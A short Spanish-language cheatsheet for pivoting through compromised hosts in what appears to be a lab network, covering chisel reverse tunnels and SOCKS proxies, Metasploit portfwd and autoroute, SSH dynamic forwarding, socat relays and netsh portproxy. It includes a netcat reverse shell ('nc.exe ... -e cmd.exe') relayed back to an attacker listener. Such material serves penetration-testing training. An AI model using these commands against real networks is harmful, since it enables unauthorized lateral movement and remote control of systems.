Pivoting
Pivoting cheatsheet with chisel, socat and metasploit
Port Forwarding
Se crea una conexión entre un puerto local y un solo puerto en un objetivo, a través de un host comprometido. Esta técnica tiende a ser más rápida y más confiable que el proxy, pero solo nos permite acceder a un solo puerto (o un pequeño rango) en un solo dispositivo de destino.
Chisel Port Forwarding
Kali Machine - 192.168.100.118
chisel server --reverse -p 1234
- reverse: permite a los clientes establecer conexiones reverse tunneling
- p: puerto de escucha http
Ubuntu Machine - 192.168.100.135/10.0.0.2
chisel client 192.168.100.118:1234 R:127.0.0.1:80:10.0.0.3:80
- R: <local-interface>:<local-port>:<remote-host>:<remote-port>
Metasploit Portfwd
In a meterpreter session
portfwd add -l 1234 -p 3389 -r 10.10.10.10
- l: puerto de escucha local
- p: puerto remoto a conectarse
- r: host remoto a conectarse
Proxying/Tunneling
Cuando hablamos de proxy, creamos una conexión a través de una máquina comprometida para enrutar todo el tráfico deseado a la red de destino. Un proxy es útil si deseamos redirigir mucho tráfico a nuestra red de destino, por ejemplo, un escaneo NMAP o para acceder a múltiples puertos en múltiples máquinas diferentes.
Chisel Socks Proxy
Kali Machine - 192.168.100.118
chisel server --reverse -p 1234
- reverse: permite a los clientes establecer conexiones reverse tunneling
- p: puerto de escucha http
Ubuntu Machine - 192.168.100.135/10.0.0.2
chisel client 192.168.100.118:1234 R:socks
SSH Port Dynamic Forwarding
Kali Machine - 192.168.100.118
ssh kryot@10.0.0.2 -D 1337
- D: puerto dinámico local
Burpsuite
Configure User Options - SOCKS Proxy
Host 127.0.0.1
Port 1337
Proxychains
nano /etc/proxychains.conf
SOCAT Tunneling
Kali Machine - 192.168.100.118
nc -lvnp 7878
Ubuntu Machine - 192.168.100.135/10.0.0.2
socat TCP-LISTEN:7777,reuseaddr,fork tcp:192.168.100.118:7878
- TCP-LISTEN: establece puerto en escucha
- reuseaddr: permite reutilizar el puerto después de la finalización del programa
- fork: indicamos que socat pueda aceptar más de una conexión.
Windows Machine - 10.0.0.3
nc.exe 10.0.0.2 7777 -e cmd.exe
Windows Proxying
netsh interface portproxy add v4tov4 listenport=9999 listenaddress=0.0.0.0 connectport=9999 connectaddress=10.90.60.80
Metasploit Autoroute
In a meterpreter session
run autoroute -s 10.0.0.3 -n 255.255.255.0
- s: host
- n: máscara de red - default 255.255.255.0